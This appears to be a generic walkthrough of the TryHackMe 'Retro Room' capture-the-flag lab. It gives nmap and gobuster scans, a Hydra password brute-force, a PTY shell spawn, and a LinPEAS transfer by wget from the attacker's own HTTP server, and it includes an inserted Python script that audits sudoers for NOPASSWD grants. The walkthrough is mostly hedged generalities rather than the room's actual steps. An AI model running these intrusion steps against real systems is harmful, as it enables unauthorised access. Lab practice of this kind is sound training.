Retro Room TryHackMe: A Comprehensive Walkthrough

by Admin

The Retro Room on TryHackMe is a beginner-friendly room themed around the retro age of computers, combining nostalgia with engaging learning experiences. The aim is to teach fundamental concepts in cyber security through gamified problem solving, making it suitable for those who are starting to learn penetration testing.

The challenges focus on enumeration, exploitation, and basic Linux commands. For those unfamiliar with TryHackMe, it's an online platform that offers a wide range of cyber security focused learning labs, often through hands-on exercises.

Initial Enumeration

The first step in any penetration testing task is enumeration. In the Retro Room, start by deploying the machine and then find its IP address. Enumeration is crucial as it provides insights into open ports, services, and possible vulnerabilities that can be exploited.

To begin:

  • Use Nmap to scan the IP address assigned to the Retro Room:

nmap -sV -A [IP_ADDRESS]

  • The results will show the open ports and services running on the machine. In most cases, the Retro Room has an open HTTP service on port 80 and possibly an FTP service as well. Enumerating these services is key to understanding how to proceed.

The HTTP service often leads to a web page that's styled in a retro theme, possibly containing clues that will guide you further. Always take note of any suspicious directories or files mentioned.

Exploring the Web Server

Once you have identified the open ports, visit the web page hosted on the HTTP server. You might encounter a simple retro-themed website with hints hidden within the HTML code. Inspect the page elements using your browser's Developer Tools (usually accessed by right-clicking on the page and selecting "Inspect").

Often, there are comments in the HTML source code that could point you towards directories or even credentials. Use Gobuster to automate the directory enumeration process.

gobuster dir -u http://[IP_ADDRESS] -w /usr/share/wordlists/dirb/common.txt

This command will help uncover hidden directories and files, which could include configuration files or scripts that may have sensitive information.

FTP Access and Credentials

The FTP server may allow anonymous login, which is an interesting entry point for attackers. To check if anonymous access is permitted, use the following command:

ftp [IP_ADDRESS]

If anonymous access is enabled, you will be able to log in without a password. Once inside, look for any files that may contain useful information, such as potential usernames or passwords for the web server.

Gaining Access

Once a vulnerability is identified, you can exploit it to gain access to the machine. For instance, if there's a Remote Code Execution (RCE) vulnerability in the web server, you can use tools like Metasploit to get a shell.

Another common method is to exploit a weak password. If you found usernames in the FTP service, try using basic password lists to gain access. A popular tool for this is Hydra:

hydra -l [username] -P /usr/share/wordlists/rockyou.txt ftp://[IP_ADDRESS]

Once you gain shell access, it's essential to stabilize your shell. You can do this by spawning a TTY shell:

python3 -c 'import pty; pty.spawn("/bin/bash")'

Privilege Escalation

The next step is privilege escalation. Enumeration scripts like LinPEAS are very helpful in identifying potential paths to escalate privileges:

Upload LinPEAS to the target machine:

python3 -m http.server 8080   # On your local machine
wget http://[YOUR_LOCAL_IP]:8080/linpeas.sh   # On the target machine

Run LinPEAS to identify any misconfigurations or exploitable services.

In many cases, outdated kernel versions or poorly configured sudo permissions provide an opportunity for privilege escalation. Look for users with NOPASSWD entries in the sudoers file or any scripts that are run as root but writable by your current user.
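Seen from the administrator's side, the same two misconfigurations can be audited before anyone else finds them. The Python sketch below is an added example, not part of the original walkthrough or of LinPEAS; the sample sudoers content and the function names nopasswd_rules and risky are constructed for illustration, and the parser is deliberately simplified.

```python
import os
import re

# Constructed sudoers content for illustration; not taken from the room.
SAMPLE_SUDOERS = """\
root    ALL=(ALL:ALL) ALL
backup  ALL=(root) NOPASSWD: /opt/scripts/backup.sh, \\
                   /usr/bin/rsync
deploy  ALL=(ALL) NOPASSWD: ALL
web     ALL=(root) NOPASSWD: /usr/bin/systemctl restart nginx, PASSWD: /usr/bin/vi
"""
# Comments, Defaults and alias definitions are not user rules.
SKIP = ("#", "Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")

def nopasswd_rules(text):
    """Return [(principal, [commands])] for commands granted with NOPASSWD."""
    # Simplified: aliases/includes are not expanded, and commas inside a
    # (runas) list or inside command arguments are not supported.
    text = re.sub(r"\\\n\s*", " ", text)  # join backslash-continued lines
    rules = []
    for line in map(str.strip, text.splitlines()):
        if line.startswith(SKIP) or "=" not in line:
            continue
        who, spec = line.split(None, 1)
        cmds, nopass = [], False
        for item in spec.split("=", 1)[1].split(","):
            item = re.sub(r"^\s*\([^)]*\)\s*", "", item).strip()  # drop (runas)
            # Tags are sticky: NOPASSWD applies until PASSWD overrides it.
            for tag in re.findall(r"\b(NOPASSWD|PASSWD):", item):
                nopass = tag == "NOPASSWD"
            cmd = re.sub(r"\b[A-Z_]+:\s*", "", item).strip()  # strip all tags
            if nopass and cmd:
                cmds.append(cmd)
        if cmds:
            rules.append((who, cmds))
    return rules

def risky(rules, trusted_uid=0):
    """Flag grants that are unrestricted or whose target file is loosely owned."""
    findings = []
    for who, cmds in rules:
        for cmd in cmds:
            path = cmd.split()[0]
            if path == "ALL":
                findings.append((who, cmd, "unrestricted"))
            elif os.path.exists(path):
                st = os.stat(path)
                # Not owned by the trusted uid, or group/other write bit set.
                if st.st_uid != trusted_uid or st.st_mode & 0o022:
                    findings.append((who, cmd, "writable by non-root"))
    return findings
```

On a real host, pass the contents of /etc/sudoers and each file under /etc/sudoers.d to nopasswd_rules; every finding is a rule to tighten or a file whose ownership and mode need to be restricted to root.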

Capturing the Flag

Once you gain root privileges, navigate through the file system to find the flag.txt file, which is typically located in the root or home directory.

cat /root/flag.txt

Congratulations, you have successfully completed the Retro Room challenge!

Conclusion

The Retro Room on TryHackMe is an excellent starting point for beginners who want to develop their skills in penetration testing. It offers a fun retro-themed experience while teaching critical skills such as enumeration, exploiting vulnerabilities, and privilege escalation. As with any cyber security task, remember the importance of methodical enumeration and keeping an open mind while approaching each challenge.
